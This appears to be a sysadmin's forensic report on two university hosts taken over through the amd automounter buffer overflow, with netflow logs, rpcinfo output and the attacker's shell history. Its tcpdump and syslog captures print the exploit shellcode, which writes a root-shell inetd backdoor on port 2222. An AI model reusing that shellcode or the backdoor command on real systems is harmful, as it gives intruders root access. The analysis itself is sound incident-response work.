Security Analysis of AMD Hacking (Case I)

Summary

Hackers first did the sunrpc scanning to 137.189 network. They compromised two hosts through the amd (Berkeley Automounter Daemon) buffer overflow vulnerability and then create a backdoor on port 2222/tcp using the file /tmp/h as a configuration file for a second instance of /usr/sbin/inetd

After the break-in, they defaced victim1 home page and use victim2 to scan other network.

See
http://www.cert.org/incident_notes/IN-99-05.html
http://www.cert.org/advisories/CA-99-12-amd.html

Chronology

Jan 12 and 14
Jan 15
Jan 16
Jan 17
Jan 18
Jan 19
Jan 20
Jan 21

Jan 12 and 14
Our router netflow log already picked up some sunprc traffic to victim1. They should sunrcp be scanning equivalent to "rpcinfo -p" query to victim1 host.

Start Time         End Time            Source            Destination         Src port            Dst port       Pkts   Oct
===========================================================================================================================
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.211      1054(         )   111 ( sunrpc  )    1     60
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.209      1052(         )   111 ( sunrpc  )    1     60
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.210      1053(         )   111 ( sunrpc  )    1     60
0112.07:55:53.266  0112.07:55:53.266   xxx.yyy.33.139  137.189.94.224      1067(         )   111 ( sunrpc  )    1     60
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.208      1051(         )   111 ( sunrpc  )    1     60
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.207      1050(         )   111 ( sunrpc  )    1     60
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.205      1048(         )   111 ( sunrpc  )    1     60
0112.07:55:53.266  0112.07:55:53.266   xxx.yyy.33.139  137.189.94.233      1076(         )   111 ( sunrpc  )    1     60
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.203      1046(         )   111 ( sunrpc  )    1     60
0112.07:55:50.266  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.201      1044(         )   111 ( sunrpc  )    2    120
0112.07:55:53.266  0112.07:55:53.266   xxx.yyy.33.139  137.189.94.234      1077(         )   111 ( sunrpc  )    1     60
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.202      1045(         )   111 ( sunrpc  )    1     60
0112.07:55:53.262  0112.07:55:53.262   xxx.yyy.33.139  137.189.94.204      1047(         )   111 ( sunrpc  )    1     60
0112.07:55:53.266  0112.07:55:53.266   xxx.yyy.33.139  137.189.94.213      1056(         )   111 ( sunrpc  )    1     60
0112.07:55:50.270  0112.07:55:53.266   xxx.yyy.33.139  137.189.94.215      1058(         )   111 ( sunrpc  )    2    120
0112.07:55:53.266  0112.07:55:53.266   xxx.yyy.33.139  137.189.94.214      1057(         )   111 ( sunrpc  )    1     60
0112.07:55:53.266  0112.07:55:53.266   xxx.yyy.33.139  137.189.94.219      1062(         )   111 ( sunrpc  )    1     60
0112.07:55:53.266  0112.07:55:53.266   xxx.yyy.33.139  137.189.94.218      1061(         )   111 ( sunrpc  )    1     60
0112.07:55:50.270  0112.07:55:53.266   xxx.yyy.33.139  137.189.94.220      1063(         )   111 ( sunrpc  )    2    120
0112.07:55:49.466  0112.07:55:53.594   xxx.yyy.33.139  137.189.94.135      4947(         )   111 ( sunrpc  )    3    156
0112.07:55:49.470  0112.07:55:53.594   xxx.yyy.33.139  137.189.94.138      4950(         )   111 ( sunrpc  )    3    120
0112.07:55:49.502  0112.07:55:53.590   xxx.yyy.33.139  137.189.94.154      4989(         )   111 ( sunrpc  )    6    364
0112.07:55:49.274  0112.07:55:53.590   xxx.yyy.33.139  137.189.94.155      4967(         )   111 ( sunrpc  )    4    216
0112.07:55:49.274  0112.07:55:53.590   xxx.yyy.33.139  137.189.94.153      4965(         )   111 ( sunrpc  )    4    216
0112.07:55:49.266  0112.07:55:53.590   xxx.yyy.33.139  137.189.94.154      4966(         )   111 ( sunrpc  )    4    216
0112.07:55:47.694  0112.07:55:53.590   xxx.yyy.33.139  137.189.94.87       4899(         )   111 ( sunrpc  )    5    240
0112.07:55:47.694  0112.07:55:53.590   xxx.yyy.33.139  137.189.94.86       4898(         )   111 ( sunrpc  )    5    276


0112.07:56:20.262  0112.07:56:28.834  xxx.yyy.33.139    137.189.victim1   2369 (         )     111 ( sunrpc  )    5     268
0112.07:56:20.678  0112.07:56:26.462  xxx.yyy.33.139    137.189.victim1   2699 (         )     111 ( sunrpc  )    6     364

0114.21:51:58.779  0114.21:51:59.79   aa.bb.6.29        137.189.victim1   1976 (         )     111 ( sunrpc  )    3     156

Actually, there are at least three hackers (ccc.dd.101.162,aa.bb.6.29,xxx.yyy.33.139) had been port scanning of 137.189 network between 12th Jan and 17th Jan.

Jan 15
This is the day that victim1 and victim2 compromised. First, the hacker (from ccc.dd.101.162) peeked the available open ports at victim1 by "rpcinfo -p" query.

0115.08:39:15.319  0115.08:39:17.431  ccc.dd.101.162    137.189.victim1    758 ( nlogin  )     111 ( sunrpc  )    6     288
0115.08:39:15.31   0115.08:39:17.419  ccc.dd.101.162    137.189.victim1  13665 (         )     111 ( sunrpc  )    3     120

0115.08:39:02.231  0115.08:39:06.351   ccc.dd.101.162  137.189.victim2   06    6206(         )   111 ( sunrpc  )    5    204
0115.08:39:03.511  0115.08:39:06.367   ccc.dd.101.162  137.189.victim2   06     690(         )   111 ( sunrpc  )    6    288

Bingo! the amd port is open!

# rpcinfo -p victim1.ie.cuhk.edu.hk
   program vers proto   port
    100000    2   tcp    111  rpcbind
    100000    2   udp    111  rpcbind
    100024    1   udp   1017  status
    100024    1   tcp   1019  status
    100011    1   udp    604  rquotad
    100011    2   udp    604  rquotad
    100005    1   udp    614  mountd
    100005    1   tcp    616  mountd
    100005    2   udp    619  mountd
    100005    2   tcp    621  mountd
    100005    3   udp    624  mountd
    100005    3   tcp    626  mountd
    100003    2   udp   2049  nfs
    100021    1   udp   1026  nlockmgr
    100021    3   udp   1026  nlockmgr
    100021    1   tcp   1024  nlockmgr
    100021    3   tcp   1024  nlockmgr
    300019    1   tcp    656  amd
    300019    1   udp    657  amd



# /usr/sbin/rpcinfo -p victim2.ie.cuhk.edu.hk
   program vers proto   port
    100000    2   tcp    111  rpcbind
    100000    2   udp    111  rpcbind
    100024    1   udp   1000  status
    100024    1   tcp   1002  status
    100011    1   udp   1011  rquotad
    100011    2   udp   1011  rquotad
    100005    1   udp   1021  mountd
    100005    1   tcp   1023  mountd
    100005    2   udp    602  mountd
    100005    2   tcp    604  mountd
    100005    3   udp    607  mountd
    100005    3   tcp    609  mountd
    100003    2   udp   2049  nfs
    100021    1   udp   1024  nlockmgr
    100021    3   udp   1024  nlockmgr
    100021    1   tcp   1024  nlockmgr
    100021    3   tcp   1024  nlockmgr
    300019    1   tcp    637  amd
    300019    1   udp    638  amd

At 18:42, the hacker came again, this time he attacked the amd port. Flushing 5.4 K data to the amd port (657).

0115.18:42:26.179  0115.18:42:46.223  ccc.dd.101.162    137.189.victim1    653 (         )     657 (  amd    )    5    5480
0115.18:42:32.659  0115.18:43:15.67   ccc.dd.101.162    137.189.victim1  31321 (         )    2222 (         )    7     299

0115.18:45:51.282  0115.18:45:56.302   ccc.dd.101.162  137.189.victim2   11     692(         )   638 (         )    2   2192
0115.18:45:50.766  0115.18:45:50.766   ccc.dd.101.162  137.189.victim2   11     691(         )   111 ( sunrpc  )    1     84
0115.18:45:52.718  0115.18:45:59.958   ccc.dd.101.162  137.189.victim2   06   31369(         )  2222 (         )    7    299

From the system log of victim1, we pick up this:

Jan 15 18:50:08 victim1 27>Jan 15 18:50:08 amd[479]: amq requested mount of ~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P~P
~P~P~P~P~P~P~P~P~P~P~Pë(^~M^^P~I^^~CÃ^H~I^^D~CÃ^C~I^^H~Cë^K~M^N~IÊ3À~IF^L~HF^W~HF^Z°^KÍ~@èÓÿÿÿ18 Jan
 1998--str/bin/sh(-c)/bin/echo '2222        stream  tcp     nowait  root    /bin/sh s
Jan 15 18:50:08 victim1 p/h;/usr/sbin/inetd /tmp/h &#~PÒòÿ¿Òòÿ¿^C
Jan 15 19:05:22 victim1 rz[25410]: [root] amdex/ZMODEM: 12716 Bytes, 3999 BPS
Jan 15 19:05:24 victim1 rz[25410]: [root] pscan.c/ZMODEM: 4805 Bytes, 3759 BPS
Jan 15 19:09:46 victim1 rz[25467]: [root] ben.c/ZMODEM: 1536 Bytes, 1972 BPS

When you look at the tcpdump, it shows:

14:09:19.621925 eth0 < ntec84.1027 > victim.711: udp 1068
.....
.....
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 9090      ................
                9090 9090 9090 9090 9090 9090 9090 eb28      ...............(
                5e8d 5e10 891e 83c3 0889 5e04 83c3 0389      ^.^.......^.....
                5e08 83eb 0b8d 0e89 ca33 c089 460c 8846      ^........3..F..F
                1788 461a b00b cd80 e8d3 ffff ff31 3820      ..F..........18 
                4a61 6e20 3139 3938 2d2d 7374 722f 6269      Jan 1998--str/bi
                6e2f 7368 282d 6329 2f62 696e 2f65 6368      n/sh(-c)/bin/ech
                6f20 2732 3232 3220 2020 2020 2020 2073      o '2222        s
                7472 6561 6d20 2074 6370 2020 2020 206e      tream  tcp     n
                6f77 6169 7420 2072 6f6f 7420 2020 202f      owait  root    /
                6269 6e2f 7368 2073 6820 2d69 273e 3e20      bin/sh sh -i'>> 
                2f74 6d70 2f68 3b2f 7573 722f 7362 696e      /tmp/h;/usr/sbin
                2f69 6e65 7464 202f 746d 702f 6820 2623      /inetd /tmp/h &#
                90d2 f2ff bfd2 f2ff bfd2 f2ff bfd2 f2ff      ................
                bfd2 f2ff bf00 0000                          ........

14:09:21.611670 eth0 < ntec84.1098 > victim.2222: S 2946836865:2946836865(0) win 32120  (DF)
                4500 003c 1342 4000 4006 a5a2 c0a8 8054      E..<.B@.@......T
                c0a8 8032 044a 08ae afa5 2981 0000 0000      ...2.J....).....
                a002 7d78 d5b3 0000 0204 05b4 0402 080a      ..}x............
                0b5e 8186 0000 0000 0103 0300                .^..........

Note, victim1 clock is about 8 minutes in advance
So the hacker overflow the amd and echo

"2222        stream  tcp     nowait  root    /bin/sh -i"

to /tmp/h. Then at 18:50:08, he started up a second instance of /usr/sbin/inetd using /tmp/h as a configuration file. Now everyone can get into victim1 root shell through the 2222 port!

At 18:58:52, another hacker (may be the same one with different IP) from 63.14.53.109, got into victim1 root through 2222 port and then use victim1 to scan 207.246. network.

0115.18:57:00.569  0115.18:58:52.533  63.14.53.109      137.189.victim1   1083 (         )    2222 (         )   97   22708
0115.19:00:49.724  0115.19:00:49.724  207.246.1.80      137.189.victim1    111 ( sunrpc  )    1594 (         )    1      40
0115.19:00:49.612  0115.19:00:49.612  207.246.1.75      137.189.victim1    111 ( sunrpc  )    1589 (         )    1      40
...
...
Between 19:00:49 and 19:16:46, the hacker had made 6578 sunrpc scans !
...
...

0115.19:16:46.965  0115.19:16:47.513  207.246.159.34    137.189.victim1    111 ( sunrpc  )     790 (         )    4     496
0115.19:16:46.797  0115.19:16:47.333  207.246.159.32    137.189.victim1    111 ( sunrpc  )     786 (         )    4     496

From the .bash_history, we have some idea what the hacker was doing at that time:

ls -l
/pwd
pwd
ls -l
pwd
uname -a; pwd;
ls
cd home
ls
cd httpd
ls
cd html
ls
./amdex 207.246.0.2
./amdex
chmod +x amdex
ls
./amdex
./amdex 207.246.0.2
./amdex 207.246.0.51
./amdex 207.246.1.3
./amdex 207.246.2.213
./amdex 207.246.2.253
./amdex 207.246.3.251
./amdex 207.246.3.254
./amdex 207.246.52.250
ls
ps ux
who
kill -9 26859
killall *
ps ux
kill -9 25479
ps ux
kill -9 25867
ps ux
ls
cd home
ls
cd httpd
ls
cd html
rz
ls
make pscan.c
ls
make pscan
ls
rm *.c
ls
./pscan
./pscan 207.246 111 &
ls
rz
make ben
ls
cat wuftp.log
./pscan 207.246 111 &
ps ux
ls
cat wuftp.log
cat wuftp.log
ps ux
sssls
ps ux
kill -9 25867
ps ux
kill -9 25866
ps ux
killall ./*
ls
ps ux
ls
rm ben*
ls
rm pscan
rm *.log

amdex, pscan and ben are the programs that the hacker uploaded to victim1 through rz (see the message log above).

amdex should be the program to attack amd port while pscan should be some scanning tool.

First the hacker try to attack some 207.246. hosts by amdex program. However, it seems that it was not effective. Hence, he killed the amdex process and started the pscan instead. As the hacker had removed the pscan and ben programs, we do not know what they really did at victim1.

Since the 2222 port backdoor has opened, there are at least 9 hackers had visited victim1 in the following days. They went in and out the victim1 as they wish.

There are also at least 14 hackers had visited victim2 between 15th Jan and 20th Jan

Wow...... What a party!

Jan 16

This day that the victim1 web pages changed.

There were still many hackers visited victim1 through 2222 on that day.

0116.15:31:52.826  0116.15:32:18.770  xx.14.43.220      137.189.victim1   1107 (         )    2222 (         )    7     306
0116.15:40:20.265  0116.15:40:34.1    yyy.197.58.25     137.189.victim1   1959 (         )    2222 (         )    5     208
0116.15:41:24.957  0116.15:41:26.829  yyy.197.58.25     137.189.victim1   1959 (         )    2222 (         )    5     213
0116.15:46:37.649  0116.15:46:37.917  yyy.197.58.25     137.189.victim1   1959 (         )    2222 (         )    2      80
0116.16:34:26.144  0116.16:34:27.180  yyy.253.90.32     137.189.victim1   1138 (         )    2222 (         )    3     128
0116.16:33:58.680  0116.16:34:24.560  xx.14.43.220      137.189.victim1   1351 (equationb)    2222 (         )    8     328
0116.16:36:32.280  0116.16:37:51.344  xx.14.43.220      137.189.victim1   1353 (         )    2222 (         )   21     874
0116.16:36:47.399  0116.16:38:21.583  yyy.253.90.32     137.189.victim1   1138 (         )    2222 (         )    9     458
0116.16:39:07.903  0116.16:39:07.903  yyy.253.42.1      137.189.victim1      0 (         )    2816 (         )    1      56
0116.16:39:42.567  0116.16:39:45.639  xx.14.43.220      137.189.victim1   1353 (         )    2222 (         )    3     120
0116.16:40:35.191  0116.16:40:49.19   yyy.253.90.46     137.189.victim1   1146 (         )    2222 (         )    6     254
0116.16:40:57.975  0116.16:40:57.975  yyy.253.42.1      137.189.victim1      0 (         )    2816 (         )    1      56
0116.16:46:09.702  0116.16:46:10.842  yyy.253.90.46     137.189.victim1   1146 (         )    2222 (         )    3     140
0116.16:47:13.546  0116.16:47:18.918  yyy.253.90.46     137.189.victim1   1146 (         )    2222 (         )    6     248
0116.16:48:10.818  0116.16:48:52.886  yyy.253.90.46     137.189.victim1   1146 (         )    2222 (         )    6     271
0116.17:23:11.712  0116.17:24:00.240  yyy.253.90.46     137.189.victim1   1146 (         )    2222 (         )   75   33065
0116.17:25:16.336  0116.17:25:41.368  yyy.253.90.46     137.189.victim1   1155 (         )      80 (   www   )   10    1217
0116.17:25:13.60   0116.17:25:35.824  yyy.253.90.46     137.189.victim1   1154 (         )      80 (   www   )   12    1559
0116.17:25:57.40   0116.17:26:22.940  yyy.253.90.46     137.189.victim1   1161 (         )      80 (   www   )   34    2229
0116.17:26:05.164  0116.17:26:28.692  xx.14.43.220      137.189.victim1   1374 (         )      80 (   www   )   12    1661
0116.17:26:09.288  0116.17:26:34.196  xx.14.43.220      137.189.victim1   1375 (         )      80 (   www   )   10    1268
0116.17:27:13.256  0116.17:27:33.416  xx.14.43.220      137.189.victim1   1376 (         )      80 (   www   )   11    1791
0116.17:27:14.904  0116.17:27:38.916  xx.14.43.220      137.189.victim1   1377 (         )      80 (   www   )    8    1448

By comparing the time stamp of the changed web page and message log, we believe that 209.253.90.46 made the change.

Jan 16 17:31:31 victim1 rz[29281]: [root] index.htm/ZMODEM: 423 Bytes, 402 BPS
Jan 16 17:31:45 victim1 rz[29281]: [root] root.JPG/ZMODEM: 16476 Bytes, 1279 BPS

From the .bash_history, we can see

who
woot
cd home/httpd/html
Is
ls
mv index.html index2.html
ls
rz
mv index.htm index.html
w00t
heat#

So the victim1 is put on the hacked site list as shown at http://www.attrition.org/mirror/attrition/2000-01.htmlSince the web page has changed, there were many 80 port traffic to victim1 so that the heat group can show off around. :(

Jan 17 At 13:48, I was infromed that victim1 was hacked from CSC. Their Web Admin received a mail informating them that victim1 is hacked. At 14:00, victim1 was disconnected from IE network and put into a private IP network for further investigation.

Jan 18
Analyse the victim1 log and system file.
Exam the router netflow log

Jan 19
Identify the hackers and send security alert to the corresponding system admin.

Jan 20
By further reviewing the netflow log, I discovered that the victim2 had been hacked too since Jan 15 via the same method used in victim1.

Jan 21
victim2 was isolated for the IE network and pluged into the private network for further investigation. The hacker had left the bscan tool and some clear log utility.

Remarks

Actually, victim1 and victim2 does not provide any service for any user. It has never been announced to anyone before. The hacker should pin point this host by their network scanning tool. Hackers are always finding holes to exploit.

References

Here is some references. You may take a look at it if you are interested and have time. :)